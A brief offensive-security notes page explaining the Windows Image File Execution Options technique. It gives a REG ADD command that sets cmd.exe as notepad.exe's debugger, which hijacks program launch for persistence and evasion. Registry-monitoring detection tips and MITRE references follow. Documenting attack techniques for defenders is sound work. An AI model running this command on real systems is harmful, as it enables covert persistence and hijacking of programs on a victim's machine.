| description |
|---|
Defense Evasion, Persistence, Privilege Escalation |
Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"{% endcode-tabs-item %} {% endcode-tabs %}
Launching a notepad on the victim system:
Same from the cmd shell:
Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:
{% embed url="https://attack.mitre.org/wiki/Technique/T1183" %}
{% embed url="https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" %}
{% embed url="https://blogs.msdn.microsoft.com/reiley/2011/07/29/a-debugging-approach-to-ifeo/" %}